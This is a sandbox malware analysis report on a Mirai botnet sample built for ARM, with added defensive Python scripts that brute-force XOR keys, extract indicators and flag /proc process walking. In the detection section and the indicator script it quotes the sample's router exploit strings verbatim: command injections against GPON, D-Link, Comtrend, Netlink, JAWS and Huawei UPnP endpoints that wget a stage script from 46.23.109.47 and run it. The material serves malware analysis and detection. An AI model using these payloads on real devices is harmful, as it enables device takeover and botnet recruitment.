Linux Analysis Report
vmDskLsKEA

Overview

General Information

Sample Name: vmDskLsKEA
Analysis ID: 679611
MD5: 342a4469d06b1438b3833d1ab38acc33
SHA1: b5fbf4cd5a4809fd06e92fa77bfdd92a408770d6
SHA256: 82c8487ec2c35eb44d47a6068c65360aa23dd17324d4954b04985856c060aab2
Tags: 32, arm, elf, mirai

Detection

Mirai
Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Contains symbols with names commonly found in malware
Yara signature match
Sample contains strings that are potentially command strings
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample and/or dropped files contains symbols with suspicious names
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: vmDskLsKEA Avira: detected
Source: vmDskLsKEA Virustotal: Detection: 59%
Source: /tmp/vmDskLsKEA (PID: 6225) Socket: 127.0.0.1::44455
Source: vmDskLsKEA String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: vmDskLsKEA String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: vmDskLsKEA String found in binary or memory: http://purenetworks.com/HNAP1/
Source: vmDskLsKEA String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: vmDskLsKEA String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: ELF static info symbol of initial sample Name: attack.c
Source: ELF static info symbol of initial sample Name: attack_app_http
Source: ELF static info symbol of initial sample Name: attack_get_opt_int
Source: ELF static info symbol of initial sample Name: attack_get_opt_ip
Source: ELF static info symbol of initial sample Name: attack_get_opt_str
Source: ELF static info symbol of initial sample Name: attack_init
Source: ELF static info symbol of initial sample Name: attack_method.c
Source: ELF static info symbol of initial sample Name: attack_method_std
Source: ELF static info symbol of initial sample Name: attack_method_tcp
Source: ELF static info symbol of initial sample Name: attack_method_tcpfrag
Source: vmDskLsKEA, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: vmDskLsKEA, type: SAMPLE Matched rule: MAL_ARM_LNX_Mirai_Mar13_2022 date = 2022-03-16, hash1 = 0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68, author = Mehmet Ali Kerimoglu a.k.a. CYB3RMX, description = Detects new ARM Mirai variant
Source: 6225.1.00007f99dc042000.00007f99dc047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f99dc042000.00007f99dc047000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
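The SUSP_XORed_Mozilla hits above come from a YARA xor modifier, so the rule can tell you that a single-byte-XORed "Mozilla/5.0" is present in the file and in two of the dumped memory regions but not which key was used. Recovering the key is a 256-candidate search, and once you have it you can decode the whole string table around the hit rather than one keyword. The script below is added here as a worked example; it is not part of the report, the signature-base rule, or the sample. Run it against the sample file (path on the command line); the blob embedded in it is constructed only so the output shape is visible offline. Note that the published rule pairs the xor(0x01-0xff) string with a "not" on the plaintext string, so a file that also carries a clear "Mozilla/5.0" does not match it; the scanner reports key 0 hits as well so you can see both.

```python
"""Recover single-byte XOR keys hiding 'Mozilla/5.0' (the key SUSP_XORed_Mozilla cannot print)."""
import sys

KEYWORD = b"Mozilla/5.0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with one key byte."""
    return bytes(b ^ key for b in data)


def find_xored_keyword(blob: bytes, keyword: bytes = KEYWORD) -> list[tuple[int, int]]:
    """Return (offset, key) for every copy of keyword XORed with a single byte.

    Key 0 is a plaintext copy. It is reported too, because the public rule only
    fires when an XORed copy exists without a plaintext one; seeing both tells
    you whether a given file is even in scope for the rule.
    """
    hits = []
    for key in range(256):
        needle = xor_bytes(keyword, key)
        start = 0
        while (idx := blob.find(needle, start)) != -1:
            hits.append((idx, key))
            start = idx + 1
    return sorted(hits)


def decode_hit(blob: bytes, offset: int, key: int, max_len: int = 256) -> bytes:
    """Decode the string at offset, stopping at the first NUL of the decoded output.

    A NUL terminator that was XORed along with the string is stored as the key
    byte itself, so decoding first and then splitting on NUL finds the real end.
    """
    decoded = xor_bytes(blob[offset:offset + max_len], key)
    return decoded.split(b"\x00", 1)[0]


# Constructed test blob (not bytes from the sample): one UA string XORed with 0x5A,
# terminator included, followed by a plaintext copy of the keyword.
SAMPLE_BLOB = (
    b"\x00" * 16
    + xor_bytes(b"Mozilla/5.0 (compatible; bot)\x00", 0x5A)
    + b"\x00" * 16
    + b"Mozilla/5.0\x00"
    + b"\x00" * 8
)


def report(blob: bytes) -> list[str]:
    """One human-readable line per hit: offset, key, decoded string."""
    lines = []
    for offset, key in find_xored_keyword(blob):
        kind = "plaintext" if key == 0 else f"xor key 0x{key:02x}"
        lines.append(f"0x{offset:08x} {kind}: {decode_hit(blob, offset, key)!r}")
    return lines


if __name__ == "__main__":
    # Usage: python xored_mozilla.py <path-to-binary>; without a path the constructed blob is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    print("\n".join(report(data)) or "no Mozilla/5.0 found under any single-byte key")
```

Once the key is known, feed the offset of the hit back into decode_hit with a larger max_len, or XOR the whole .rodata section with it: Mirai-family bots keep their user-agent and other strings in one obfuscated table, so one key usually unlocks the rest of the table.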
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: vmDskLsKEA ELF static info symbol of initial sample: __gnu_unwind_execute
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: asus_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: comtrend_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: dlink_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_fake_time
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_rsck
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: dlinkscanner_setup_connection
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon443_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: gpon80_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: hnap_scanner.c
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_fake_time
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_rsck
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_init
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_scanner_rawpkt
Source: vmDskLsKEA ELF static info symbol of initial sample: hnapscanner_setup_connection
Source: vmDskLsKEA ELF static info symbol of initial sample: huawei_scanner_pid
Source: vmDskLsKEA ELF static info symbol of initial sample: huawei_scanner_rawpkt
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
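Decoded, the "Potential command" and busybox strings above are one-line command injections against router web endpoints (/ping.cgi, /login.cgi, /shell, /boaform/admin/formPing, /GponForm/diag_Form, and a UPnP WANPPPConnection Upgrade SOAP body): each fetches a stage script or binary from 46.23.109.47 under /Cloud/ and executes it. The script below is added as a worked example and is not part of the report or of the sample; the function and field names are my own. It URL-decodes each string exactly as the report quotes it, parses the request line, and pulls out the download host and path, the stage file and the injected command chain, turning the report's strings into a block-list and a set of detection terms.

```python
"""Pull IOCs out of the exploit request strings the report lists for this sample."""
import re
from urllib.parse import unquote_plus

# Exploit strings exactly as quoted in the report's "Potential command" and 'busybox' findings.
REPORT_STRINGS = [
    "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1",
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1",
    "GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1",
    "GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1",
    '<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>',
]

REQUEST_RE = re.compile(r"(GET|POST) (/\S*) HTTP/1\.[01]")
# Dotted-quad hosts only: the SOAP namespace URLs in the same strings are not attacker infrastructure.
URL_RE = re.compile(r"(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/[^\s;'\"`)]*)")
# 'wget URL -O name' or 'wget URL -O -> /tmp/name' names the file the stage is written to.
STAGE_RE = re.compile(r"-O\s+(?:->\s+)?([^\s;`'\"]+)")
SHELL_CMDS = {"wget", "tftp", "curl", "chmod", "sh", "rm", "cd", "echo"}
# Injected commands are chained with ; or wrapped in ` ` / $( ); '?' separates the path from the query.
SEGMENT_RE = re.compile(r";|\?|`|\$\(|\|{1,2}|&&")


def shell_commands(decoded: str) -> list[str]:
    """First token of every command segment, in execution order ('./name' counts as execution)."""
    cmds = []
    for seg in SEGMENT_RE.split(decoded):
        tokens = seg.split()
        if not tokens:
            continue
        if tokens[0].rsplit("/", 1)[-1] == "busybox" and len(tokens) > 1:
            tokens = tokens[1:]  # 'busybox wget' and '/bin/busybox wget' both mean wget
        if tokens[0] in SHELL_CMDS or tokens[0].startswith("./"):
            cmds.append(tokens[0])
    return cmds


def extract_iocs(raw: str) -> dict:
    """Endpoint, download URLs, stage file names and command chain for one exploit string."""
    # Parse the request line before decoding: %20 keeps the target path space-free.
    m = REQUEST_RE.search(raw)
    decoded = unquote_plus(raw)
    return {
        "endpoint": unquote_plus(m.group(2).split("?", 1)[0]) if m else None,
        "downloads": URL_RE.findall(decoded),
        "stage_files": STAGE_RE.findall(decoded),
        "commands": shell_commands(decoded),
        "decoded": decoded,
    }


def summarize(strings: list[str]) -> tuple[set[str], set[str]]:
    """Distinct download hosts and URL paths across all strings (the block-list)."""
    hosts, paths = set(), set()
    for s in strings:
        for host, path in extract_iocs(s)["downloads"]:
            hosts.add(host)
            paths.add(path)
    return hosts, paths


if __name__ == "__main__":
    for s in REPORT_STRINGS:
        i = extract_iocs(s)
        print(f"{i['endpoint'] or '(body only)':28} cmds={i['commands']} dl={i['downloads']} stage={i['stage_files']}")
    print(summarize(REPORT_STRINGS))
```

The host set is a single IP, 46.23.109.47, which is the distribution server for every stage (Comtrend.sh, Dlink.sh, Jaws.sh, Netlink.sh, Gpon.sh, Cloud.mips); the report's scanner symbols (comtrend_scanner, dlinkscanner_*, gpon80/gpon443_scanner, hnapscanner_*, huawei_scanner_*) line up with those script names. The /GponForm/diag_Form request with ?images/ in the URL and the WANPPPConnection Upgrade body with a command in NewStatusURL are the public GPON (CVE-2018-10561/10562) and Huawei HG532 (CVE-2017-17215) exploits; the report itself names no CVEs, so treat that mapping as the editor's, not the sandbox's. The endpoint column is what to put in a web-server or IDS signature; the decoded field is what the target device actually sees, so test signatures against that form, not the percent-encoded one.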
Source: classification engine Classification label: mal68.troj.lin@0/0@0/0
Source: /tmp/vmDskLsKEA (PID: 6229) Reads from proc file: /proc/stat
Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/<pid>/exe for 105 PIDs: 6236, 6235, 1582, 2033, 2275, 3088, 6191, 6190, 1612, 1579, 1699, 1335, 1698, 2028, 1334, 1576, 2302, 3236, 2025, 2146, 910, 912, 6229, 517, 759, 2307, 918, 6240, 6243, 6244, 6247, 6246, 1594, 2285, 2281, 1349, 1623, 761, 1622, 884, 1983, 2038, 1344, 1465, 1586, 1463, 2156, 800, 6238, 801, 1629, 1627, 1900, 6252, 6253, 6258, 6257, 3021, 491, 2294, 2050, 1877, 772, 1633, 1599, 1632, 774, 1477, 654, 896, 1476, 1872, 2048, 655, 1475, 2289, 656, 777, 657, 4466, 658, 4467, 6248, 4468, 4469, 4502, 419, 936, 1639, 1638, 2208, 2180, 1809, 1494, 1890, 2063, 2062, 6261, 6260, 1888, 1886, 420, 1489, 785, 1642
Source: /tmp/vmDskLsKEA (PID: 6225) Queries kernel information via 'uname'
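One process of the sample (PID 6227) opens /proc/<pid>/exe for every other process on the box, including a sibling process of the same binary (PID 6229). That is the walk the public Mirai source performs in its killer routine: resolve each process's executable through /proc/<pid>/exe, then kill anything that looks like a competing bot or holds a port it wants. The script below is added as a worked example, not part of the report; it aggregates the report's own behaviour lines (a subset of the 105 opens, in the report's text format, plus one constructed benign line) into a per-process count and flags processes that touched at least N distinct /proc/<pid>/exe entries, separately noting targets that are the sample's own sibling processes. The threshold and function names are mine.

```python
"""Flag a process that enumerates /proc/<pid>/exe the way the Mirai killer does."""
import re
from collections import defaultdict

# Behaviour lines as listed in the report (first ten /proc/<pid>/exe opens plus the 6229 one),
# and one constructed line for a benign tool so the aggregation has something to ignore.
BEHAVIOR_LINES = [
    "Source: /tmp/vmDskLsKEA (PID: 6225) Queries kernel information via 'uname'",
    "Source: /tmp/vmDskLsKEA (PID: 6229) Reads from proc file: /proc/stat",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6236/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6235/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1582/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2033/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/2275/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/3088/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6191/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6190/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1612/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/1579/exe",
    "Source: /tmp/vmDskLsKEA (PID: 6227) File opened: /proc/6229/exe",
    "Source: /usr/bin/top (PID: 4242) File opened: /proc/self/stat",  # constructed, not from the report
]

SOURCE_RE = re.compile(r"^Source: (?P<image>\S+) \(PID: (?P<pid>\d+)\)")
EXE_OPEN_RE = re.compile(r"^Source: (?P<image>\S+) \(PID: (?P<pid>\d+)\) File opened: /proc/(?P<target>\d+)/exe$")


def proc_exe_opens(lines: list[str]) -> dict[tuple[str, int], set[int]]:
    """Map (image, pid) to the set of target PIDs whose /proc/<pid>/exe it opened."""
    opens: dict[tuple[str, int], set[int]] = defaultdict(set)
    for line in lines:
        m = EXE_OPEN_RE.match(line.strip())
        if m:
            opens[(m["image"], int(m["pid"]))].add(int(m["target"]))
    return opens


def pids_per_image(lines: list[str]) -> dict[str, set[int]]:
    """Every PID the report attributes to each image (the sample ran as several processes)."""
    pids: dict[str, set[int]] = defaultdict(set)
    for line in lines:
        m = SOURCE_RE.match(line.strip())
        if m:
            pids[m["image"]].add(int(m["pid"]))
    return pids


def flag_process_scanners(lines: list[str], threshold: int = 10) -> list[tuple[str, int, int, list[int]]]:
    """Return (image, pid, distinct targets, targets that are siblings of the same image)
    for every process that opened at least `threshold` distinct /proc/<pid>/exe entries."""
    opens = proc_exe_opens(lines)
    pids = pids_per_image(lines)
    flagged = []
    for (image, pid), targets in sorted(opens.items()):
        if len(targets) >= threshold:
            siblings = sorted(t for t in targets if t in pids[image] and t != pid)
            flagged.append((image, pid, len(targets), siblings))
    return flagged


if __name__ == "__main__":
    for image, pid, count, siblings in flag_process_scanners(BEHAVIOR_LINES):
        print(f"{image} pid {pid}: opened /proc/<pid>/exe for {count} processes; own siblings probed: {siblings}")
```

Read the flagged tuple with the rest of the report in mind: the full listing has 105 distinct targets from one PID in one run, far above anything a single readlink of a known PID would produce. The caveat for turning this into a host detection is that ps, top, lsof and most EDR agents also walk /proc, so the rule needs an image allow-list, and a bot that has just been started from /tmp (as here) is the kind of image that should never be on it.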
Source: vmDskLsKEA, 6225.1.00005564dbe5e000.00005564dbfb0000.rw-.sdmp, vmDskLsKEA, 6228.1.00005564dbe5e000.00005564dbf8c000.rw-.sdmp Binary or memory string: dU!/etc/qemu-binfmt/arm
Source: vmDskLsKEA, 6225.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp, vmDskLsKEA, 6228.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp Binary or memory string: m9x86_64/usr/bin/qemu-arm/tmp/vmDskLsKEASUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/vmDskLsKEA
Source: vmDskLsKEA, 6225.1.00005564dbe5e000.00005564dbfb0000.rw-.sdmp, vmDskLsKEA, 6228.1.00005564dbe5e000.00005564dbf8c000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: vmDskLsKEA, 6225.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp, vmDskLsKEA, 6228.1.00007ffd2da8a000.00007ffd2daab000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Source: Yara match File source: vmDskLsKEA, type: SAMPLE
Source: Yara match File source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: vmDskLsKEA, type: SAMPLE
Source: Yara match File source: 6228.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6225.1.00007f99dc017000.00007f99dc039000.r-x.sdmp, type: MEMORY
No contacted IP infos